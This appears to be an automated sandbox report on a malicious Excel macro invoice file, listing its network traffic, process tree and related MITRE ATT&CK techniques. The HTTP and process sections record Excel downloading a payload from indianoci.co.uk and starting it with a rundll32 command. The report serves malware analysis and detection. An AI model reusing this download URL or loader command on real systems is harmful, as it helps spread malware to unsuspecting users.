,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2021 00:16:55.747047901 CEST	49713	80	192.168.2.3	172.67.189.4
Apr 11, 2021 00:16:55.775840044 CEST	80	49713	172.67.189.4	192.168.2.3
Apr 11, 2021 00:16:55.775976896 CEST	49713	80	192.168.2.3	172.67.189.4
Apr 11, 2021 00:16:55.776480913 CEST	49713	80	192.168.2.3	172.67.189.4
Apr 11, 2021 00:16:55.805140018 CEST	80	49713	172.67.189.4	192.168.2.3
Apr 11, 2021 00:16:55.828572035 CEST	80	49713	172.67.189.4	192.168.2.3
Apr 11, 2021 00:16:55.828622103 CEST	80	49713	172.67.189.4	192.168.2.3
Apr 11, 2021 00:16:55.828656912 CEST	80	49713	172.67.189.4	192.168.2.3
Apr 11, 2021 00:16:55.828701019 CEST	49713	80	192.168.2.3	172.67.189.4
Apr 11, 2021 00:16:55.828766108 CEST	49713	80	192.168.2.3	172.67.189.4
Apr 11, 2021 00:16:55.828777075 CEST	49713	80	192.168.2.3	172.67.189.4
Apr 11, 2021 00:18:42.739722013 CEST	49713	80	192.168.2.3	172.67.189.4
Apr 11, 2021 00:18:42.768620968 CEST	80	49713	172.67.189.4	192.168.2.3
Apr 11, 2021 00:18:42.768901110 CEST	49713	80	192.168.2.3	172.67.189.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2021 00:16:41.630199909 CEST	57544	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:41.642940044 CEST	53	57544	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:43.169007063 CEST	55984	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:43.183543921 CEST	53	55984	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:43.817776918 CEST	64185	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:43.830389977 CEST	53	64185	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:44.512424946 CEST	65110	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:44.526330948 CEST	53	65110	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:45.245145082 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:45.258902073 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:46.207685947 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:46.220434904 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:51.013355970 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:51.026460886 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:51.796119928 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:51.808504105 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:52.776112080 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:52.822726011 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:52.871478081 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:52.884902954 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:53.131850004 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:53.145723104 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:54.134819031 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:54.147749901 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:55.155042887 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:55.167969942 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:55.704058886 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:55.743108034 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:55.909338951 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:55.922063112 CEST	53	51352	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:56.774822950 CEST	59349	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:56.788069010 CEST	53	59349	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:57.160152912 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:57.172883987 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:57.506046057 CEST	57084	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:57.518795013 CEST	53	57084	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:58.276417971 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:58.289179087 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 11, 2021 00:16:59.815046072 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:16:59.827958107 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 11, 2021 00:17:01.117827892 CEST	50540	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:17:01.131715059 CEST	53	50540	8.8.8.8	192.168.2.3
Apr 11, 2021 00:17:01.167803049 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:17:01.181021929 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 11, 2021 00:17:02.103447914 CEST	54366	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:17:02.116221905 CEST	53	54366	8.8.8.8	192.168.2.3
Apr 11, 2021 00:17:04.066437960 CEST	53034	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:17:04.079101086 CEST	53	53034	8.8.8.8	192.168.2.3
Apr 11, 2021 00:17:08.813133955 CEST	57762	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:17:08.825639963 CEST	53	57762	8.8.8.8	192.168.2.3
Apr 11, 2021 00:17:12.113722086 CEST	55435	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:17:12.131546021 CEST	53	55435	8.8.8.8	192.168.2.3
Apr 11, 2021 00:17:19.082400084 CEST	50713	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:17:19.134360075 CEST	53	50713	8.8.8.8	192.168.2.3
Apr 11, 2021 00:17:43.563807011 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:17:43.575984001 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 11, 2021 00:17:46.275264978 CEST	58987	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:17:46.293052912 CEST	53	58987	8.8.8.8	192.168.2.3
Apr 11, 2021 00:18:17.996232033 CEST	56579	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:18:18.009129047 CEST	53	56579	8.8.8.8	192.168.2.3
Apr 11, 2021 00:18:26.311083078 CEST	60633	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:18:26.337780952 CEST	53	60633	8.8.8.8	192.168.2.3
Apr 11, 2021 00:18:27.152786016 CEST	61292	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:18:27.171003103 CEST	53	61292	8.8.8.8	192.168.2.3
Apr 11, 2021 00:19:00.756851912 CEST	63619	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:19:00.769555092 CEST	53	63619	8.8.8.8	192.168.2.3
Apr 11, 2021 00:19:00.947961092 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 11, 2021 00:19:00.961838007 CEST	53	64938	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 11, 2021 00:16:55.704058886 CEST	192.168.2.3	8.8.8.8	0x50ed	Standard query (0)	indianoci.co.uk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 11, 2021 00:16:55.743108034 CEST	8.8.8.8	192.168.2.3	0x50ed	No error (0)	indianoci.co.uk		172.67.189.4	A (IP address)	IN (0x0001)
Apr 11, 2021 00:16:55.743108034 CEST	8.8.8.8	192.168.2.3	0x50ed	No error (0)	indianoci.co.uk		104.21.43.238	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

indianoci.co.uk

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49713	172.67.189.4	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2021 00:16:55.776480913 CEST	345	OUT	GET /ufriends/support.php HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: indianoci.co.uk Connection: Keep-Alive
Apr 11, 2021 00:16:55.828572035 CEST	346	IN	HTTP/1.1 200 OK Date: Sat, 10 Apr 2021 22:16:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d9a2ec1f65f187ad70787abe583994aa21618093015; expires=Mon, 10-May-21 22:16:55 GMT; path=/; domain=.indianoci.co.uk; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 095f751af40000ee278f26a000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qhYrkAqBru9Yg2fmBLp0xleUzeSJdlp0sukelkpjkQb1Oq2Eya5kD4aGQVAObSXCePNDr8Vloz19uYqhfFWXuyYWiJZbxvGUjSEvoXt4rmU%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63df57a4bbb0ee27-CDG Content-Encoding: gzip alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 36 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 58 6d 6f dc 36 12 fe be bf 62 ac 03 ea 04 30 a5 dd b5 13 bf 69 55 b4 89 5b 18 e8 a1 c6 c5 41 ae 28 02 83 22 47 12 13 8a 54 48 6a d7 8b 5c fe fb 81 14 77 ad f5 4b 5a df 97 03 0c 58 24 87 0f 67 86 cf 33 24 37 df 7b fb fb 9b eb 3f ae 2e a0 71 ad 2c 26 f9 1e 21 7f 8a 0a a4 83 cb 0b 38 fe 58 40 ee 07 80 49 6a ed 22 51 9a 7c b2 20 f0 35 68 c9 05 26 20 a9 aa 17 09 2a f2 fe 5d 52 40 be f7 27 2a 2e aa 8f 84 dc 41 45 1c 80 c7 a1 8e 9f 07 75 f2 1d a8 93 67 40 d5 2e a2 f9 8e c7 a2 7c 88 42 c8 2e 52 83 94 17 93 dc 09 27 b1 78 d7 db 0e 99 43 0e 5d 23 6c 23 54 0d 56 38 84 ff c0 1b a9 7b 5e 49 6a 30 cf 06 db 49 de a2 a3 c0 1a 6a 2c ba 45 f2 fe fa 17 72 92 40 b6 19 68 9c eb 08 7e e9 c5 72 91 bc d1 ca a1 72 e4 7a dd 61 02 6c 68 2d 12 87 b7 2e f3 3e 9f 6f 61 be 87 f2 6f f2 fe 27 f2 46 b7 1d 75 a2 94 63 a0 cb 8b c5 05 af f1 80 35 46 b7 b8 98 8d 00 14 6d 71 91 18 5d 6a 67 47 33 94 16 8a e3 ed 01 28 5d 69 29 f5 ea c1 94 a5 c0 55 a7 8d 1b 4d 5a 09 ee 9a 05 c7 a5 60 48 42 e3 40 28 e1 04 95 c4 32 2a b7 0b 4b a1 3e 83 41 b9 48 ac 5b 4b b4 0d a2 4b 40 f0 45 c2 aa 9b a1 8b 30 6b 13 68 0c 56 8b 24 63 5c 11 56 8b 6c 18 ca 58 95 a2 31 da d8 34 18 b9 75 87 31 57 a1 dd 22 17 74 91 58 66 10 d5 41 67 f4 27 64 4e 68 35 ac bd 43 fd d3 8f c5 d3 ce ec df 39 23 d0 fb b3 ff 97 fe 08 7c be 4b bb 74 0b 90 f7 e7 17 a5 e6 eb af 2d 35 b5 50 67 d3 f3 8e 72 2e 54 7d 36 fd 96 0f 2e 14 93 c9 88 f2 e8 23 9b 4d 23 e9 27 b9 65 46 74 ae 98 00 88 0a 5e ec 29 ba 14 35 75 da a4 4c eb cf 02 2f 14 2d 25 f2 97 f0 75 e2 35 b7 12 8a eb 55 4a 39 bf 58 a2 72 bf 09 eb 50 Data Ascii: 6d0Xmo6b0iU[A("GTHj\wKZX$g3$7{?.q,&!8X@Ij"Q\| 5h& ]R@'.AEug@.\|B.R'xC]#l#TV8{^Ij0Ij,Er@h~rrzalh-.>oao'Fuc5Fmq]jgG3(]i)UMZ`HB@(2*K>AH[KK@E0khV$c\VlX14u1W"tXfAg'dNh5C9#\|Kt-5Pgr.T}6.#M#'eFt^)5uL/-%u5UJ9XrP

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2576 Parent PID: 792

General

Start time:	00:16:51
Start date:	11/04/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x1070000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 5380 Parent PID: 2576

General

Start time:	00:16:56
Start date:	11/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 ..\GVer.iks,StartW
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report invoice_661434949_67552437.xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "invoice_661434949_67552437.xlsm"

Indicators

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 2576 Parent PID: 792

General

Analysis Process: rundll32.exe PID: 5380 Parent PID: 2576

General

Disassembly

Code Analysis